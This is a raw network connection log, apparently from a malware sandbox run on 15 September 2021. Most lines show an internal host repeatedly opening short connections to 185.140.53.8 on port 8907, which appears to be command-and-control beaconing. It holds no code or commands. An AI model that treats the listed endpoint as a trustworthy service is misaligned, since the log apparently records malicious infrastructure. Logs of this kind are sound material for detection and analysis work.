Sep 15, 2021 06:13:34.035243034 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.035310030 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.036303043 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.036381960 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.036395073 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.036442995 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.037147999 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.037214994 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.038281918 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.038333893 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.038336039 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.038384914 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.039299011 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.039346933 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.039362907 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.039490938 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.040205956 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.040260077 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.041208029 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.041254044 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.042237043 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.042273998 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.042344093 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.042373896 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.043277979 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.043328047 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.044224977 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.044265032 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.044286966 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.044311047 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.045160055 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.045353889 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.046314955 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.046348095 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.046379089 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.046402931 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.047240019 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.047305107 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.048116922 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.048187017 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.048221111 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.048268080 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.049278021 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.049338102 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.050213099 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.050271034 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.050379992 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.050429106 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.051222086 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.051270008 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.052177906 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.052197933 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.052244902 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.052264929 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061610937 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061647892 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061682940 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061687946 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061711073 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061714888 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061738014 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061745882 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061764002 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061789036 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061803102 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061811924 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061815023 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061824083 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061835051 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061841011 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061856985 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061873913 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.061892986 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.061916113 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.062061071 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.062109947 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.062122107 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.062158108 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.062171936 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.062196970 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:38.018256903 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:38.187104940 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:38.187271118 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:38.187895060 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:38.507083893 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:38.507354021 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:38.907270908 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:38.907448053 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:39.102257013 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:39.102421045 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:39.498114109 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:39.498317957 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:39.726315975 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:39.726346970 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:39.726440907 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:39.728169918 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:39.911290884 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:39.911350965 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:39.911549091 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:39.925344944 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:39.925400972 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:39.925565958 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:40.017647982 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:40.109704018 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:40.109777927 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:40.110018969 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:40.110877037 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:40.110985994 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:40.111268044 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:40.111349106 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:40.111365080 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:40.111429930 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:40.112246037 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:40.112296104 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:40.112337112 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:40.112395048 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:40.117475986 CEST	8907	49737	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:40.117677927 CEST	49737	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:44.028459072 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:44.201826096 CEST	8907	49742	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:44.201958895 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:44.206046104 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:44.507256031 CEST	8907	49742	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:44.507409096 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:44.995431900 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:45.027299881 CEST	8907	49742	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:45.029409885 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:45.169156075 CEST	8907	49742	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:45.605006933 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:45.780210018 CEST	8907	49742	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:45.780409098 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:45.783130884 CEST	8907	49742	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:45.823642015 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:46.011676073 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:46.166997910 CEST	8907	49742	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:46.167103052 CEST	49742	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:50.028948069 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:50.208427906 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:50.208551884 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:50.209237099 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:50.507189989 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:50.507318974 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:50.995966911 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:51.029007912 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:51.029341936 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:51.172887087 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:51.621695995 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:51.800122023 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:51.800256968 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:51.801126957 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:51.855544090 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:52.187199116 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:52.187299013 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:52.444072962 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:52.496088028 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:52.691436052 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:52.691494942 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:52.691668034 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:52.754674911 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:52.877312899 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:52.877368927 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:52.878107071 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:52.878151894 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:52.891272068 CEST	8907	49745	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:52.891331911 CEST	49745	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:56.768372059 CEST	49746	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:56.943093061 CEST	8907	49746	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:56.943336964 CEST	49746	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:56.944143057 CEST	49746	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:57.224239111 CEST	8907	49746	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:57.224314928 CEST	49746	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:57.397073984 CEST	8907	49746	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:57.397218943 CEST	49746	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:57.574223042 CEST	8907	49746	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:57.575434923 CEST	49746	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:57.653744936 CEST	49746	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:01.813862085 CEST	49747	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:01.984227896 CEST	8907	49747	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:01.984395027 CEST	49747	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:01.984973907 CEST	49747	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:02.271544933 CEST	8907	49747	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:02.274174929 CEST	49747	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:02.447422981 CEST	8907	49747	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:02.447601080 CEST	49747	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:02.591305971 CEST	49747	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:02.625154018 CEST	8907	49747	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:02.625317097 CEST	49747	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:05.919745922 CEST	49680	80	192.168.2.3	23.203.69.124
Sep 15, 2021 06:14:05.919919014 CEST	49679	443	192.168.2.3	23.203.67.116
Sep 15, 2021 06:14:05.938612938 CEST	80	49680	23.203.69.124	192.168.2.3
Sep 15, 2021 06:14:05.938633919 CEST	443	49679	23.203.67.116	192.168.2.3
Sep 15, 2021 06:14:05.938644886 CEST	443	49679	23.203.67.116	192.168.2.3
Sep 15, 2021 06:14:05.938752890 CEST	49680	80	192.168.2.3	23.203.69.124
Sep 15, 2021 06:14:05.938841105 CEST	49679	443	192.168.2.3	23.203.67.116
Sep 15, 2021 06:14:05.938879967 CEST	49679	443	192.168.2.3	23.203.67.116
Sep 15, 2021 06:14:06.405837059 CEST	49683	80	192.168.2.3	8.253.207.121
Sep 15, 2021 06:14:06.425687075 CEST	80	49683	8.253.207.121	192.168.2.3
Sep 15, 2021 06:14:06.426407099 CEST	49683	80	192.168.2.3	8.253.207.121
Sep 15, 2021 06:14:06.608014107 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:06.785085917 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:06.785212994 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:06.785681963 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:07.063622952 CEST	80	49684	93.184.220.29	192.168.2.3
Sep 15, 2021 06:14:07.063807964 CEST	49684	80	192.168.2.3	93.184.220.29
Sep 15, 2021 06:14:07.099045038 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:07.099214077 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:07.465178013 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:07.465291023 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:07.641217947 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:07.641390085 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:07.707753897 CEST	49687	443	192.168.2.3	23.35.237.194
Sep 15, 2021 06:14:07.708336115 CEST	49689	80	192.168.2.3	93.184.220.29
Sep 15, 2021 06:14:07.967875957 CEST	80	49688	93.184.220.29	192.168.2.3
Sep 15, 2021 06:14:07.968013048 CEST	49688	80	192.168.2.3	93.184.220.29
Sep 15, 2021 06:14:08.012206078 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.014533043 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.308453083 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.308577061 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.309242964 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.309326887 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.511203051 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.511315107 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.512157917 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.512202978 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.513231039 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.519181013 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.519361973 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.607295990 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.710365057 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.710489988 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.719506025 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.719552994 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.719630957 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.719762087 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.720221043 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.720264912 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.720313072 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.720352888 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.721118927 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.721230984 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.721261024 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.721348047 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:08.722024918 CEST	8907	49754	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:08.722120047 CEST	49754	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:12.631850958 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:12.819067001 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:12.819242001 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:12.820795059 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:13.127203941 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:13.127541065 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:13.499222994 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:13.499360085 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:13.674196005 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:13.674473047 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.060244083 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.060528040 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.316548109 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.316605091 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.316677094 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.316729069 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.512635946 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.512769938 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.513214111 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.513322115 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.513328075 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.513411999 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.528342962 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.528424025 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.686249971 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.706135988 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.706443071 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.709358931 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.709537983 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.710211992 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.710272074 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.710345984 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.710418940 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.711267948 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.711389065 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.712167025 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.712223053 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.712291002 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.712357044 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.713186026 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.713310957 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.719206095 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.719345093 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:14.860013008 CEST	8907	49774	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:14.860131979 CEST	49774	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:18.704401016 CEST	49775	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:18.901968002 CEST	8907	49775	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:18.902152061 CEST	49775	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:18.902806044 CEST	49775	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:19.113986969 CEST	8907	49775	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:19.114217043 CEST	49775	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:19.326874018 CEST	49775	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:19.500073910 CEST	8907	49775	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:19.500248909 CEST	49775	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:23.343791008 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:23.514911890 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:23.515074015 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:23.515492916 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:23.827260971 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:23.827364922 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:24.227030993 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:24.229983091 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:24.425081968 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:24.425239086 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:24.815268040 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:24.816087008 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.078357935 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.078629017 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.079221964 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.079334974 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.256223917 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.256478071 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.264384031 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.264446020 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.264564991 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.265880108 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.266000986 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.423579931 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.451533079 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.451585054 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.451723099 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.453860044 CEST	8907	49779	185.140.53.8	192.168.2.3
